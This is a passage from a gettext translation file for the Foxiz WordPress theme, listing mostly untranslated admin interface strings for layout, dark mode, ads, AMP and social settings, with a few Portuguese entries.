msgstr "" #: backend/configs.php:330 backend/configs.php:874 msgid "Border" msgstr "" #: backend/configs.php:331 msgid "Border (Big)" msgstr "" #: backend/panels/header-style.php:621 msgid "Border Top & Bottom Shadow" msgstr "" #: backend/panels/amp.php:481 msgid "Bottom - Ad Type" msgstr "" #: backend/panels/amp.php:509 msgid "Bottom - Adsense Size" msgstr "" #: backend/panels/amp.php:521 msgid "Bottom - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:493 msgid "Bottom - Data Ad Client" msgstr "" #: backend/panels/amp.php:501 msgid "Bottom - Data Ad Slot" msgstr "" #: backend/panels/blog-pages.php:658 msgid "Bottom Area Template Shortcode" msgstr "" #: backend/configs.php:334 backend/panels/blog-pages.php:51 #: backend/panels/blog-pages.php:617 backend/panels/blog-pages.php:1935 #: backend/panels/header-style.php:72 backend/panels/header-style.php:617 #: backend/single-metaboxes.php:134 backend/single-metaboxes.php:911 msgid "Bottom Border" msgstr "" #: backend/configs.php:335 msgid "Bottom Border (Big)" msgstr "" #: backend/panels/single-post.php:845 msgid "Bottom Content Share Bar" msgstr "" #: backend/configs.php:332 msgid "Bottom Dotted" msgstr "" #: backend/configs.php:333 msgid "Bottom Dotted (Big)" msgstr "" #: backend/single-metaboxes.php:692 msgid "Bottom Entry Widgets Area" msgstr "" #: backend/panels/single-post.php:327 backend/panels/single-post.php:333 msgid "Bottom Newsletter" msgstr "" #: backend/configs.php:374 msgid "Bottom Right" msgstr "" #: backend/configs.php:375 msgid "Bottom Right (Big Icon)" msgstr "" #: backend/panels/amp.php:475 msgid "Bottom Single Content Ad Settings" msgstr "" #: backend/panels/block-grid.php:672 backend/panels/block-grid.php:859 #: backend/panels/block-list.php:524 backend/panels/block-list.php:719 msgid "Box Color" msgstr "" #: backend/panels/privacy.php:21 msgid "Box Position" msgstr "" #: backend/panels/block-grid.php:526 backend/panels/block-grid.php:713 #: backend/panels/block-list.php:377 backend/panels/block-list.php:572 msgid "Box Style" msgstr "" #: backend/panels/block-grid.php:522 backend/panels/block-grid.php:709 #: backend/panels/block-list.php:373 backend/panels/block-list.php:568 msgid "boxed grid" msgstr "" #: backend/category-settings.php:246 backend/configs.php:459 #: backend/panels/block-grid.php:512 msgid "Boxed Grid 1" msgstr "" #: backend/category-settings.php:247 backend/configs.php:463 #: backend/panels/block-grid.php:699 msgid "Boxed Grid 2" msgstr "" #: backend/category-settings.php:251 backend/configs.php:479 #: backend/panels/block-list.php:363 msgid "Boxed List 1" msgstr "" #: backend/category-settings.php:252 backend/configs.php:483 #: backend/panels/block-list.php:558 msgid "Boxed List 2" msgstr "" #: backend/category-settings.php:100 backend/panels/typography.php:845 msgid "Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:14 backend/panels/breadcrumb.php:30 msgid "Breadcrumb Bar" msgstr "" #: backend/panels/color.php:140 msgid "Breadcrumb Color" msgstr "" #: backend/panels/typography.php:853 msgid "Breadcrumb Font" msgstr "" #: backend/install-plugins.php:43 msgid "Breadcrumb NavXT" msgstr "" #: backend/panels/optimized.php:138 msgid "" "Breadcrumbs are a hierarchy of links displayed in search engines and your " "website. This option requests the \"Breadcrumb NavXT\"." msgstr "" #: backend/panels/optimized.php:137 msgid "Breadcrumbs bar" msgstr "" #: backend/single-metaboxes.php:744 msgid "Break Page Selection" msgstr "" #: backend/configs.php:845 msgid "Button (125x125)" msgstr "" #: backend/panels/typography.php:636 msgid "Button Font" msgstr "" #: backend/panels/typography.php:630 msgid "Button Font Settings" msgstr "" #: backend/panels/ads.php:512 msgid "Button Text Color" msgstr "" #: backend/panels/single-post.php:488 msgid "" "By default, Primary category setting will only apply to the post listing." msgstr "" #: backend/panels/privacy.php:35 msgid "" "By using this site, you agree to the Privacy Policy and Terms of Use." msgstr "" #: backend/panels/design.php:453 msgid "Carousel Free Scroll" msgstr "" #: backend/panels/blog-pages.php:17 msgid "Category" msgstr "" #: backend/configs.php:404 backend/panels/design.php:270 msgid "category (Categories)" msgstr "" #: backend/panels/breadcrumb.php:72 msgid "Category Breadcrumb" msgstr "" #: templates/parts.php:756 msgid "category featured" msgstr "" #: backend/category-settings.php:73 backend/category-settings.php:78 #: backend/panels/blog-pages.php:77 backend/panels/blog-pages.php:82 msgid "Category Header" msgstr "" #: backend/mega-menu.php:120 msgid "Category Mega Menu" msgstr "" #: backend/panels/design.php:145 msgid "Category Meta Icon" msgstr "" #: backend/configs.php:379 backend/panels/login.php:41 msgid "Center" msgstr "" #: backend/configs.php:380 msgid "Center (Big Icon)" msgstr "" #: backend/panels/header.php:344 msgid "Center Logo" msgstr "" #: backend/panels/amp.php:110 backend/panels/footer.php:171 msgid "Centered Mode" msgstr "" #: backend/panels/block-classic.php:163 backend/panels/block-grid.php:163 #: backend/panels/block-grid.php:328 backend/panels/block-grid.php:493 #: backend/panels/block-grid.php:666 backend/panels/block-grid.php:853 #: backend/panels/block-list.php:171 backend/panels/block-list.php:344 #: backend/panels/block-list.php:539 backend/panels/block-list.php:734 msgid "Centering Content" msgstr "" #: backend/panels/block-classic.php:164 backend/panels/block-grid.php:164 #: backend/panels/block-grid.php:329 backend/panels/block-grid.php:494 #: backend/panels/block-grid.php:667 backend/panels/block-grid.php:854 #: backend/panels/block-list.php:172 backend/panels/block-list.php:345 #: backend/panels/block-list.php:540 backend/panels/block-list.php:735 msgid "Centering text and elements for the post listing." msgstr "" #: backend/panels/amp.php:111 backend/panels/footer.php:172 msgid "Centering this section." msgstr "" #: backend/panels/block-classic.php:27 msgid "classic" msgstr "" #: backend/category-settings.php:243 backend/configs.php:447 #: backend/panels/block-classic.php:17 msgid "Classic (Standard)" msgstr "" #: backend/panels/sidebar.php:40 msgid "" "Click on the \"Create Sidebar\" button, then input a name/ID (without " "special charsets and spacing) into the field to create a new sidebar." msgstr "" #: backend/panels/sidebar.php:41 msgid "Click then Input ID to Create a Sidebar" msgstr "" #: backend/panels/header.php:367 msgid "Collapse Section" msgstr "" #: backend/panels/header.php:440 backend/panels/header.php:493 msgid "Collapse Section - Text Color" msgstr "" #: backend/panels/header.php:429 backend/panels/header.php:482 msgid "Collapse Section Background" msgstr "" #: backend/mega-menu.php:218 msgid "Color" msgstr "" #: backend/panels/header.php:321 msgid "" "Color settings will apply to the tablet and mobile header. Leave blank to " "set as the desktop navigation colors." msgstr "" #: backend/panels/single-post.php:714 backend/panels/single-post.php:853 #: backend/panels/single-post.php:991 backend/panels/single-post.php:1612 msgid "Colorful Icons" msgstr "" #: backend/panels/footer.php:106 msgid "Column Border" msgstr "" #: backend/mega-menu.php:161 msgid "Column Mega Menu" msgstr "" #: backend/category-settings.php:282 backend/panels/blog-pages.php:282 #: backend/panels/blog-pages.php:769 backend/panels/blog-pages.php:1183 #: backend/panels/blog-pages.php:1591 backend/panels/blog-pages.php:2083 #: backend/panels/bookmark.php:186 backend/panels/bookmark.php:626 #: backend/panels/bookmark.php:634 msgid "Columns Gap" msgstr "" #: backend/category-settings.php:258 backend/panels/blog-pages.php:258 #: backend/panels/blog-pages.php:745 backend/panels/blog-pages.php:1567 #: backend/panels/blog-pages.php:2059 backend/panels/bookmark.php:162 msgid "Columns on Desktop" msgstr "" #: backend/category-settings.php:274 backend/panels/blog-pages.php:274 #: backend/panels/blog-pages.php:761 backend/panels/blog-pages.php:1175 #: backend/panels/blog-pages.php:1583 backend/panels/blog-pages.php:2075 #: backend/panels/bookmark.php:178 backend/panels/bookmark.php:618 msgid "Columns on Mobile" msgstr "" #: backend/category-settings.php:266 backend/panels/blog-pages.php:266 #: backend/panels/blog-pages.php:753 backend/panels/blog-pages.php:1167 #: backend/panels/blog-pages.php:1575 backend/panels/blog-pages.php:2067 #: backend/panels/bookmark.php:170 backend/panels/bookmark.php:610 msgid "Columns on Tablet" msgstr "" #: backend/mega-menu.php:181 backend/panels/blog-pages.php:1159 #: backend/panels/bookmark.php:602 backend/panels/header.php:126 msgid "Columns per Row" msgstr "" #: backend/configs.php:407 backend/panels/design.php:273 msgid "comment (Comments)" msgstr "" #: backend/panels/amp.php:213 msgid "Comment Box" msgstr "" #: backend/panels/design.php:124 msgid "Comment Meta Icon" msgstr "" #: backend/panels/single-post.php:1203 msgid "Comments" msgstr "Comentários" #: comments.php:32 msgid "Comments are closed." msgstr "" #: backend/panels/privacy.php:33 msgid "Content" msgstr "" #: backend/panels/single-post.php:155 msgid "Content Area" msgstr "" #: backend/panels/typography.php:722 msgid "Content Font Size (Small Headline)" msgstr "" #: backend/panels/typography.php:779 msgid "Content Font Size (Small Tagline)" msgstr "" #: backend/panels/table-contents.php:134 msgid "Contents" msgstr "" #: templates/single/next-posts.php:43 msgid "Continue Reading" msgstr "" #: backend/panels/single-post.php:813 backend/panels/single-post.php:952 #: backend/panels/single-post.php:1090 msgid "Copy Link" msgstr "" #: backend/panels/footer.php:207 msgid "Copyright - Font Size" msgstr "" #: backend/panels/footer.php:199 msgid "Copyright Menu" msgstr "" #: backend/panels/footer.php:213 msgid "Copyright Menu - Font Size" msgstr "" #: backend/panels/amp.php:124 backend/panels/amp.php:130 #: backend/panels/footer.php:185 msgid "Copyright Section" msgstr "" #: backend/panels/footer.php:191 msgid "Copyright Text" msgstr "" #: backend/panels/newsletter.php:71 msgid "Cover Image" msgstr "" #: backend/panels/design.php:331 msgid "Create a New Crop Size" msgstr "" #: backend/panels/sidebar.php:39 msgid "Create new or delete exist sidebars." msgstr "" #: backend/single-metaboxes.php:516 msgid "Create your review criteria based on the type you choose." msgstr "" #: backend/single-metaboxes.php:523 msgid "Criteria" msgstr "" #: backend/panels/design.php:313 msgid "Crop Position" msgstr "" #: backend/panels/reaction.php:51 msgid "Cry" msgstr "" #: backend/single-metaboxes.php:598 msgid "Currency" msgstr "" #: backend/configs.php:410 msgid "custom (Custom)" msgstr "" #: backend/category-settings.php:351 msgid "Custom Below" msgstr "" #: backend/panels/single-post.php:647 msgid "Custom date format for the last updated info." msgstr "" #: backend/panels/design.php:230 backend/single-metaboxes.php:283 #: backend/single-metaboxes.php:289 msgid "Custom Entry Meta" msgstr "" #: backend/category-settings.php:336 backend/panels/blog-pages.php:358 #: backend/panels/blog-pages.php:845 backend/panels/blog-pages.php:1259 #: backend/panels/blog-pages.php:1667 backend/panels/blog-pages.php:2159 #: backend/panels/bookmark.php:258 backend/panels/bookmark.php:706 msgid "Custom Featured Ratio" msgstr "" #: backend/panels/header.php:602 msgid "Custom Forget Password URL" msgstr "" #: backend/panels/ads.php:102 backend/panels/ads.php:291 msgid "Custom Image" msgstr "" #: backend/panels/ads.php:193 backend/panels/ads.php:382 msgid "Custom Image - Ad Destination" msgstr "" #: backend/panels/ads.php:179 backend/panels/ads.php:368 msgid "Custom Image - Ad Image" msgstr "" #: backend/panels/ads.php:186 backend/panels/ads.php:375 msgid "Custom Image - Dark Mode Ad Image" msgstr "" #: backend/panels/ads.php:200 backend/panels/ads.php:389 msgid "Custom Image - Max Width" msgstr "" #: backend/panels/ads.php:173 backend/panels/ads.php:362 msgid "Custom Image Settings" msgstr "" #: backend/panels/login.php:25 msgid "Custom Login Screen" msgstr "" #: backend/panels/header.php:595 msgid "Custom Register URL" msgstr "" #: backend/panels/design.php:685 msgid "Custom Round Corner" msgstr "" #: backend/panels/header.php:231 msgid "Custom Search SVG" msgstr "" #: backend/category-settings.php:402 backend/configs.php:210 msgid "Custom Settings Below" msgstr "" #: backend/panels/ads.php:135 backend/panels/ads.php:324 msgid "Custom Size Below" msgstr "" #: backend/panels/socials.php:198 msgid "Custom Social 1 - Color" msgstr "" #: backend/panels/socials.php:189 msgid "Custom Social 1 - Icon" msgstr "" #: backend/panels/socials.php:183 msgid "Custom Social 1 - Name" msgstr "" #: backend/panels/socials.php:177 msgid "Custom social 1 - URL" msgstr "" #: backend/panels/socials.php:225 msgid "Custom Social 2 - Color" msgstr "" #: backend/panels/socials.php:216 msgid "Custom Social 2 - Icon" msgstr "" #: backend/panels/socials.php:210 msgid "Custom Social 2 - Name" msgstr "" #: backend/panels/socials.php:204 msgid "Custom social 2 - URL" msgstr "" #: backend/panels/socials.php:252 msgid "Custom Social 3 - Color" msgstr "" #: backend/panels/socials.php:243 msgid "Custom Social 3 - Icon" msgstr "" #: backend/panels/socials.php:237 msgid "Custom Social 3 - Name" msgstr "" #: backend/panels/socials.php:231 msgid "Custom social 3 - URL" msgstr "" #: backend/panels/socials.php:165 msgid "Custom Social Profiles" msgstr "" #: backend/panels/block-grid.php:679 backend/panels/block-grid.php:866 #: backend/panels/block-list.php:531 backend/panels/block-list.php:726 msgid "Dark - Box Color" msgstr "" #: backend/panels/woocommerce.php:196 msgid "Dark - Price Color" msgstr "" #: backend/panels/woocommerce.php:212 msgid "Dark - Review Start Color" msgstr "" #: backend/panels/color.php:57 msgid "Dark Accent Color" msgstr "" #: backend/panels/color.php:52 msgid "Dark Accent Colors" msgstr "" #: backend/panels/blog-pages.php:52 backend/panels/blog-pages.php:618 #: backend/panels/blog-pages.php:1936 backend/panels/header-style.php:73 #: backend/panels/header-style.php:619 backend/single-metaboxes.php:135 #: backend/single-metaboxes.php:912 msgid "Dark Bottom Border" msgstr "" #: backend/panels/blog-pages.php:2398 msgid "Dark Header Image" msgstr "" #: backend/panels/dark-mode.php:16 backend/panels/dark-mode.php:28 msgid "Dark Mode" msgstr "" #: backend/panels/heading.php:74 backend/panels/heading.php:159 msgid "Dark Mode - Accent Heading Color" msgstr "" #: backend/mega-menu.php:249 msgid "Dark Mode - Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:230 backend/panels/header.php:698 #: backend/panels/privacy.php:56 msgid "Dark Mode - Background Color" msgstr "" #: backend/panels/ads.php:520 msgid "Dark Mode - Button Text Color" msgstr "" #: backend/mega-menu.php:226 msgid "Dark Mode - Color" msgstr "" #: backend/panels/footer.php:152 msgid "Dark Mode - Copyright Logo" msgstr "" #: backend/panels/color.php:65 msgid "Dark Mode - Dark Accent Color" msgstr "" #: backend/panels/bookmark.php:128 backend/panels/bookmark.php:471 msgid "Dark Mode - Description Image" msgstr "" #: backend/panels/footer.php:40 msgid "Dark Mode - Footer Background" msgstr "" #: backend/panels/header.php:580 msgid "Dark Mode - Form Logo" msgstr "" #: backend/panels/color.php:36 msgid "Dark Mode - Global Highlight Color" msgstr "" #: backend/panels/blog-pages.php:1982 msgid "Dark Mode - Header Background" msgstr "" #: backend/panels/single-post.php:226 msgid "Dark Mode - Hyperlink Color" msgstr "" #: backend/panels/logo.php:54 msgid "Dark Mode - Main Logo" msgstr "" #: backend/panels/logo.php:103 msgid "Dark Mode - Mobile Logo" msgstr "" #: backend/panels/heading.php:66 backend/panels/heading.php:151 msgid "Dark Mode - Primary Heading Color" msgstr "" #: backend/panels/logo.php:70 msgid "Dark Mode - Retina Main Logo" msgstr "" #: backend/panels/ads.php:229 msgid "Dark Mode - Section Background" msgstr "" #: backend/panels/ads.php:506 msgid "Dark Mode - Slide Up Background" msgstr "" #: backend/category-settings.php:44 backend/panels/design.php:60 #: backend/panels/header.php:706 backend/panels/privacy.php:64 msgid "Dark Mode - Text Color" msgstr "" #: backend/panels/single-post.php:253 msgid "Dark Mode - Underline Color" msgstr "" #: backend/panels/color.php:86 msgid "Dark Mode Background" msgstr "" #: backend/panels/color.php:81 backend/panels/header-style.php:185 #: backend/panels/header-style.php:474 backend/panels/header-style.php:740 #: backend/panels/header.php:456 msgid "Dark Mode Colors" msgstr "" #: backend/mega-menu.php:153 msgid "Dark Text" msgstr "" #: backend/panels/header-style.php:620 msgid "Dark Top & Bottom Border" msgstr "" #: backend/configs.php:403 backend/panels/design.php:269 msgid "date (Publish Date)" msgstr "" #: backend/panels/single-post.php:646 msgid "Date Format" msgstr "" #: backend/panels/reaction.php:47 msgid "Dead" msgstr "" #: backend/panels/amp.php:56 msgid "Debug Mode" msgstr "" #: backend/panels/amp.php:63 msgid "" "Debug mode will provide more information about the each AMP page such as CSS " "usages, plugin scripts etc..." msgstr "" #: backend/panels/amp.php:214 backend/panels/blog-pages.php:49 #: backend/panels/blog-pages.php:615 backend/panels/blog-pages.php:1933 #: backend/panels/design.php:676 backend/single-metaboxes.php:146 #: backend/single-metaboxes.php:157 backend/single-metaboxes.php:923 #: backend/single-metaboxes.php:934 msgid "Default" msgstr "" #: backend/panels/footer.php:65 backend/panels/header-style.php:91 #: backend/panels/header-style.php:379 backend/panels/header-style.php:646 #: backend/panels/header.php:288 msgid "Default (Dark Text)" msgstr "" #: backend/panels/design.php:352 msgid "Default Crop Size Settings" msgstr "" #: backend/panels/dark-mode.php:42 msgid "Default Dark Mode" msgstr "" #: backend/category-settings.php:469 backend/category-settings.php:499 msgid "Default from Category Settings" msgstr "" #: backend/panels/amp.php:187 backend/panels/amp.php:196 #: backend/panels/amp.php:205 backend/panels/amp.php:223 #: backend/panels/amp.php:232 msgid "Default from Single Settings" msgstr "" #: backend/panels/heading.php:97 msgid "Default layout is based on the \"Global Heading Layout\" setting." msgstr "" #: backend/panels/logo.php:30 msgid "Default Logos" msgstr "" #: backend/panels/single-post.php:1187 msgid "Default Review Image" msgstr "" #: backend/panels/single-post.php:1164 msgid "Default Review Type" msgstr "" #: backend/panels/typography.php:1111 msgid "Default Widgets" msgstr "" #: backend/panels/design.php:327 msgid "Define Custom Crop Sizes" msgstr "" #: backend/panels/ads.php:494 backend/panels/newsletter.php:111 msgid "Delay Time" msgstr "" #: backend/panels/adblock.php:33 backend/panels/blog-pages.php:2411 #: backend/panels/newsletter.php:41 #: woocommerce/single-product/tabs/description.php:24 msgid "Description" msgstr "" #: backend/panels/bookmark.php:120 backend/panels/bookmark.php:463 msgid "Description Image" msgstr "" #: backend/category-settings.php:441 backend/panels/blog-pages.php:468 #: backend/panels/blog-pages.php:955 backend/panels/blog-pages.php:1369 #: backend/panels/blog-pages.php:1777 backend/panels/blog-pages.php:2269 #: backend/panels/bookmark.php:367 backend/panels/bookmark.php:815 msgid "Desktop - Title Font Size" msgstr "" #: backend/panels/header.php:277 msgid "Destination Link" msgstr "" #: backend/panels/adblock.php:14 msgid "" "Detecting most of the AdBlock extensions and show a popup to disable the " "extension." msgstr "" #: templates/parts.php:627 msgid "Digg" msgstr "" #: backend/panels/socials.php:104 msgid "Digg URL" msgstr "" #: backend/panels/single-post.php:1139 backend/single-metaboxes.php:648 msgid "Directly Redirect" msgstr "" #: backend/single-metaboxes.php:649 msgid "" "Directly redirect to the sponsor website when clicking on the post listing " "title." msgstr "" #: backend/panels/single-post.php:1140 msgid "" "Directly redirect to the sponsored URL when visitors click on the post title " "in the blog listing." msgstr "" #: backend/category-settings.php:106 backend/category-settings.php:118 #: backend/category-settings.php:317 backend/category-settings.php:350 #: backend/category-settings.php:473 backend/category-settings.php:503 #: backend/configs.php:197 backend/configs.php:297 backend/configs.php:303 #: backend/configs.php:337 backend/configs.php:343 backend/configs.php:358 #: backend/configs.php:381 backend/configs.php:387 backend/configs.php:427 #: backend/configs.php:433 backend/configs.php:587 #: backend/panels/blog-pages.php:326 backend/panels/blog-pages.php:497 #: backend/panels/blog-pages.php:527 backend/panels/blog-pages.php:813 #: backend/panels/blog-pages.php:984 backend/panels/blog-pages.php:1014 #: backend/panels/blog-pages.php:1227 backend/panels/blog-pages.php:1398 #: backend/panels/blog-pages.php:1428 backend/panels/blog-pages.php:1635 #: backend/panels/blog-pages.php:1806 backend/panels/blog-pages.php:1836 #: backend/panels/blog-pages.php:2127 backend/panels/blog-pages.php:2298 #: backend/panels/blog-pages.php:2328 backend/panels/bookmark.php:229 #: backend/panels/bookmark.php:396 backend/panels/bookmark.php:415 #: backend/panels/bookmark.php:677 backend/panels/bookmark.php:844 #: backend/panels/bookmark.php:871 backend/panels/breadcrumb.php:55 #: backend/panels/breadcrumb.php:66 backend/panels/breadcrumb.php:77 #: backend/panels/breadcrumb.php:88 backend/panels/breadcrumb.php:99 #: backend/panels/footer.php:99 backend/panels/page.php:87 #: backend/panels/single-post.php:239 backend/panels/single-post.php:454 #: backend/panels/single-post.php:1181 backend/panels/single-post.php:1223 #: backend/single-metaboxes.php:147 backend/single-metaboxes.php:159 #: backend/single-metaboxes.php:362 backend/single-metaboxes.php:410 #: backend/single-metaboxes.php:488 backend/single-metaboxes.php:653 #: backend/single-metaboxes.php:686 backend/single-metaboxes.php:697 #: backend/single-metaboxes.php:716 backend/single-metaboxes.php:826 #: backend/single-metaboxes.php:845 backend/single-metaboxes.php:864 #: backend/single-metaboxes.php:875 backend/single-metaboxes.php:924 #: backend/single-metaboxes.php:936 msgid "Disable" msgstr "" #: backend/panels/login.php:119 backend/panels/login.php:146 msgid "Disable Admin Bar" msgstr "" #: backend/panels/login.php:120 backend/panels/login.php:147 msgid "Disable admin bar for all users except for Administrators" msgstr "" #: backend/panels/single-post.php:1232 msgid "Disable All Comments" msgstr "" #: backend/panels/ads.php:60 msgid "" "Disable auto Adsense on Woocommerce such as shop, product, cart, checkout...." msgstr "" #: backend/panels/amp.php:216 msgid "Disable comment form on AMP site." msgstr "" #: backend/panels/optimized.php:43 msgid "Disable Dashicons" msgstr "" #: backend/panels/optimized.php:81 msgid "Disable Default Fonts" msgstr "" #: backend/panels/optimized.php:51 msgid "Disable Gutenberg Style on Page Builder" msgstr "" #: backend/panels/login.php:126 backend/panels/login.php:153 msgid "Disable Language Bar" msgstr "" #: backend/panels/amp.php:188 backend/panels/amp.php:197 #: backend/panels/amp.php:206 backend/panels/amp.php:215 #: backend/panels/amp.php:224 backend/panels/amp.php:233 msgid "Disable on AMP" msgstr "" #: backend/panels/ads.php:59 msgid "Disable on Woocommerce Pages" msgstr "" #: backend/panels/blog-pages.php:83 msgid "Disable or select a category header style for the category pages." msgstr "" #: backend/category-settings.php:79 msgid "Disable or select a category header style for this category page." msgstr "" #: backend/category-settings.php:366 backend/panels/block-classic.php:59 #: backend/panels/block-grid.php:59 backend/panels/block-grid.php:224 #: backend/panels/block-grid.php:389 backend/panels/block-grid.php:562 #: backend/panels/block-grid.php:749 backend/panels/block-list.php:67 #: backend/panels/block-list.php:240 backend/panels/block-list.php:421 #: backend/panels/block-list.php:616 backend/panels/blog-pages.php:393 #: backend/panels/blog-pages.php:880 backend/panels/blog-pages.php:1294 #: backend/panels/blog-pages.php:1702 backend/panels/blog-pages.php:2194 #: backend/panels/bookmark.php:292 backend/panels/bookmark.php:740 msgid "Disable or select setting for entry review meta." msgstr "" #: backend/category-settings.php:382 backend/panels/block-classic.php:74 #: backend/panels/block-grid.php:74 backend/panels/block-grid.php:239 #: backend/panels/block-grid.php:404 backend/panels/block-grid.php:577 #: backend/panels/block-grid.php:764 backend/panels/block-list.php:82 #: backend/panels/block-list.php:255 backend/panels/block-list.php:436 #: backend/panels/block-list.php:631 backend/panels/blog-pages.php:409 #: backend/panels/blog-pages.php:896 backend/panels/blog-pages.php:1310 #: backend/panels/blog-pages.php:1718 backend/panels/blog-pages.php:2210 #: backend/panels/bookmark.php:308 backend/panels/bookmark.php:756 msgid "Disable or select setting for the post format." msgstr "" #: backend/panels/blog-pages.php:425 backend/panels/blog-pages.php:912 #: backend/panels/blog-pages.php:1326 backend/panels/blog-pages.php:1734 #: backend/panels/blog-pages.php:2226 backend/panels/bookmark.php:324 #: backend/panels/bookmark.php:772 msgid "Disable or select settings for the post excerpt." msgstr "" #: backend/panels/optimized.php:59 msgid "Disable Polyfill Script" msgstr "" #: backend/panels/design.php:673 msgid "Disable round corner style for whole the website." msgstr "" #: backend/panels/optimized.php:35 msgid "Disable Srcset" msgstr "" #: backend/panels/optimized.php:36 msgid "Disable Srcset to optimize page speed score on mobile device." msgstr "" #: backend/panels/amp.php:189 backend/panels/amp.php:198 msgid "Disable the Author Card in the AMP mode." msgstr "" #: backend/panels/optimized.php:52 msgid "Disable the block style css on the page built with Page Builder." msgstr "" #: backend/panels/login.php:127 backend/panels/login.php:154 msgid "Disable the language bar in the login screen." msgstr "" #: backend/panels/amp.php:207 msgid "Disable the Next/Prev Articles section in the AMP mode." msgstr "" #: backend/panels/amp.php:225 msgid "Disable the related section in the AMP mode." msgstr "" #: backend/panels/amp.php:234 msgid "Disable the single post sidebar section in the AMP mode." msgstr "" #: backend/single-metaboxes.php:143 msgid "Disable the top ad site for this page." msgstr "" #: backend/panels/optimized.php:60 msgid "" "Disable wp-polyfill script (supporting older browsers that do not understand " "ES6) to improve the page speed score." msgstr "" #: backend/panels/single-post.php:1371 msgid "Disabled" msgstr "" #: backend/single-metaboxes.php:568 msgid "disadvantage item" msgstr "" #: backend/single-metaboxes.php:560 msgid "Disadvantages" msgstr "" #: backend/class-tgm-plugin-activation.php:407 msgid "Dismiss this notice" msgstr "" #: backend/mega-menu.php:235 msgid "" "Display a icon before this menu item label. You can choose font icon or " "custom attachment image/SVG." msgstr "" #: backend/mega-menu.php:211 msgid "Display a sub label after this navigation label." msgstr "" #: backend/panels/design.php:185 msgid "Display Human Time (Ago)" msgstr "" #: backend/panels/newsletter.php:93 msgid "Display Mode" msgstr "" #: backend/single-metaboxes.php:745 msgid "" "Display page selected section when you use break pages for a lengthy content " "post." msgstr "" #: backend/panels/woocommerce.php:182 msgid "Display Percentage saved on WooCommerce sale products" msgstr "" #: backend/panels/single-post.php:1275 backend/panels/table-contents.php:141 #: backend/single-metaboxes.php:736 msgid "Display Position" msgstr "" #: backend/panels/ads.php:428 backend/panels/amp.php:588 msgid "Display Positions" msgstr "" #: backend/mega-menu.php:121 msgid "Display posts of this category." msgstr "" #: backend/panels/design.php:206 msgid "Display the edit post link for the logged users on the featured image." msgstr "" #: backend/panels/single-post.php:1738 msgid "Display the reading indicator bar at the top site." msgstr "" #: includes/sidebars.php:80 msgid "Display widget ad at the bottom of the website header." msgstr "" #: backend/panels/newsletter.php:104 msgid "Distance of Scroll" msgstr "" #: backend/panels/ads.php:134 backend/panels/ads.php:323 msgid "Do not Override" msgstr "" #: backend/panels/ads.php:45 msgid "Do not place more than one auto ads code in the website." msgstr "" #: templates/parts.php:630 msgid "Dribbble" msgstr "" #: backend/panels/socials.php:110 msgid "Dribbble URL" msgstr "" #: templates/parts.php:175 #, php-format msgid "Dynamic %s pagination" msgstr "" #: backend/panels/amp.php:181 msgid "" "Each AMP page has a 75,000 byte CSS limit, turn off unnecessary section will " "increase the AMP performance." msgstr "" #: backend/panels/amp.php:50 msgid "" "Each AMP page has a 75,000 byte CSS limit. Foxiz will support a compact " "footer to ensure your website will meet with this requirement." msgstr "" #: backend/panels/header.php:128 msgid "" "Each widget is added in \"Appearance >Widgets > More Menu Section\" will be " "corresponding to a column." msgstr "" #: templates/single/templates.php:970 msgid "Edit" msgstr "Editar" #: templates/entry.php:828 msgid "edit" msgstr "editar" #: backend/panels/design.php:205 msgid "Edit Link" msgstr "" #: templates/parts.php:120 msgid "Edit Page" msgstr "" #: backend/panels/design.php:200 backend/panels/design.php:337 msgid "Edit Post Link" msgstr "" #: backend/install-plugins.php:30 msgid "Elementor Website Builder" msgstr "" #: backend/panels/woocommerce.php:172 msgid "Elements Styling" msgstr "" #: backend/panels/optimized.php:195 backend/panels/single-post.php:804 #: backend/panels/single-post.php:943 backend/panels/single-post.php:1081 #: backend/panels/single-post.php:1705 msgid "Email" msgstr "" #: backend/panels/reaction.php:52 msgid "Embarrass" msgstr "" #: backend/category-settings.php:117 backend/category-settings.php:316 #: backend/configs.php:196 backend/configs.php:425 backend/mega-menu.php:131 #: backend/panels/blog-pages.php:325 backend/panels/blog-pages.php:812 #: backend/panels/blog-pages.php:1226 backend/panels/blog-pages.php:1634 #: backend/panels/blog-pages.php:2126 backend/panels/bookmark.php:228 #: backend/panels/bookmark.php:676 backend/panels/login.php:30 #: backend/panels/page.php:86 backend/panels/single-post.php:238 #: backend/panels/single-post.php:453 backend/panels/single-post.php:1179 #: backend/single-metaboxes.php:158 backend/single-metaboxes.php:361 #: backend/single-metaboxes.php:409 backend/single-metaboxes.php:477 #: backend/single-metaboxes.php:616 backend/single-metaboxes.php:654 #: backend/single-metaboxes.php:685 backend/single-metaboxes.php:696 #: backend/single-metaboxes.php:715 backend/single-metaboxes.php:825 #: backend/single-metaboxes.php:844 backend/single-metaboxes.php:863 #: backend/single-metaboxes.php:876 backend/single-metaboxes.php:935 msgid "Enable" msgstr "" #: backend/panels/single-post.php:1225 msgid "Enable for All Posts" msgstr "" #: backend/panels/single-post.php:1224 msgid "Enable for Review Posts" msgstr "" #: backend/panels/header.php:216 msgid "Enable live search result when typing." msgstr "" #: backend/single-metaboxes.php:821 msgid "" "Enable or disable ajax load next posts for this post. This setting will " "override on the global setting." msgstr "" #: backend/panels/single-post.php:1434 msgid "" "Enable or disable ajax load next posts when visitors reached end of the post " "content." msgstr "" #: backend/single-metaboxes.php:405 msgid "Enable or disable autoplay audio for this post." msgstr "" #: backend/panels/design.php:427 msgid "Enable or disable autoplay for the sliders." msgstr "" #: backend/single-metaboxes.php:357 msgid "Enable or disable autoplay video for this post." msgstr "" #: backend/panels/single-post.php:715 backend/panels/single-post.php:854 #: backend/panels/single-post.php:992 backend/panels/single-post.php:1613 msgid "Enable or disable color for social icons." msgstr "" #: backend/panels/single-post.php:480 msgid "Enable or disable entry category info in the single post." msgstr "" #: backend/panels/design.php:454 msgid "Enable or disable free mode when scrolling on the carousels." msgstr "" #: backend/panels/design.php:648 msgid "Enable or disable GIF supported for your website." msgstr "" #: backend/panels/table-contents.php:149 msgid "Enable or disable hierarchy for the table of contents box." msgstr "" #: backend/panels/design.php:492 msgid "Enable or disable icon for the audio post format." msgstr "" #: backend/panels/design.php:485 msgid "Enable or disable icon for the gallery post format." msgstr "" #: backend/panels/design.php:478 msgid "Enable or disable icon for the video post format." msgstr "" #: backend/panels/optimized.php:237 msgid "" "Enable or disable Open Graph (share to social). This option will be " "automatically disabled if you use Yoast SEO." msgstr "" #: backend/panels/optimized.php:75 